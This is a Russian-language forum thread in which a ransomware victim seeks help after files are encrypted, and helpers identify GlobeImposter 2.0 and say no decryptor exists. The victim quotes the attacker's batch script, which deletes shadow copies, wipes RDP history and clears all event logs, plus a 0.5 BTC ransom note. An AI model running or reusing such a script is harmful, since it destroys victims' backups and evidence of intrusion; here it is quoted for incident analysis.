Перейти к содержанию

Рекомендуемые сообщения

Опубликовано

Здравствуйте

 

Зашифровали все рабочие данные.
с добавлением к имени "{travolta_john@aol.com}"
Во всех папках прилагался файл:

how_to_back_files.html

 

проверили с помошью

Выявлены следующие результаты:
https://ibb.co/gkS4L0

https://ibb.co/dEmBYL

bat файл содержил следующую информацию:

 

@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp 
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
 
Логи в файле:
CollectionLog-2018.10.31-12.07.zip

 

Спасибо, очень ждем Вашей помощи.

 
 

how_to_back_files.html

CollectionLog-2018.10.31-12.07.zip

Опубликовано

Здравствуйте!

 

Автологер разве не предупредил вас, что запущен из терминальной сессии, а надо из консоли?

По возможности, переделайте.

 

+ пару зашифрованных документов в архиве прикрепите к следующему сообщению.

Опубликовано

К сожалению проделать выгрузку логов не из терминала, нет возможности.
Файлы для примера в Архиве "Примеры.rar".

 

Примеры.rar

Опубликовано

К сожалению, это GlobeImposter 2.0 и расшифровки нет.

Опубликовано

Переписка с злоумышленником:

1 ID = 0.5 BTC 
For decrypt need pay 0.5 BTC 
You can send me one file for test. 
File only picture or text. No database, no backup. 
Only we can decrypt your data.
 
 
Опубликовано

На ваш страх и риск. Известны случаи, когда после получения оплаты злодеи исчезали и ничего не высылали.

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • elemag
      Автор elemag
      Здравствуйте друзья,
       
      Нас тоже  атаковал тот же самый вирус benjamin_jack2811 ransomware. Искренне надеюсь, что есть какой-то способ расшифровать данные и восстановить их. Если это поможет, могу Вам отправить два одинаковых файла - один из них незараженный, а другой шифрованный ( зараженный ). Я не знаю может ли это помочь каким-то образом, но это моя последняя надежда в этой неприятной ситуации.
       
      Заранее спасибо!
       
      Сообщение от модератора Mark D. Pearlstone Перемещено из темы
    • Alexey_juma
      Автор Alexey_juma
      Добрый день. Утром злоумышленник зашифровал часть файлов на компьютере, в сети и на удаленных серверах. Формат зашифрованных файлов .mark. Зашифрованные файлы имеют формат Autoconfig.ini.mark. Прошу оказать помощь в расшифровке файлов.
      CollectionLog-2018.12.19-11.10.zip
    • IstoD
      Автор IstoD
      День добрый, подскажите как расшифровать файл формата .ms
       
      Пароль на архив - infected
      inf.7z
    • g.paluch
      Автор g.paluch
      Ребята помогите! Шифровальщик зашифровал все файлы с разрешением .MS. Что делать?
    • Evgen_
      Автор Evgen_
      Добрый день !
      Сервер был зашифрован. Компьютер и службы - все работает, но все файлы зашифрованы.
      В требовании прислать денег фигурирует адрес почты crypto.support@aol.com. Подозрения на GlobeImposter.
      Помогите, пожалуйста.

      В приложении логи, пару зашифрованных файлов, страница кому оплатить. Создать расшифровку с помощью virusinfo.info не смог, лог virusinfo_auto_имя_вашего_ПК.zip по видимому слишком большой 350 мб, возможная причина того, что в обратную форму он не грузится (начинает грузить и обрывается, страница не доступна, пробовал с разных ПК и разных браузеров). Могу "virusinfo_auto_SRV-SV.zip" загрузить любым другим образом, как скажите.
      1.zip
×
×
  • Создать...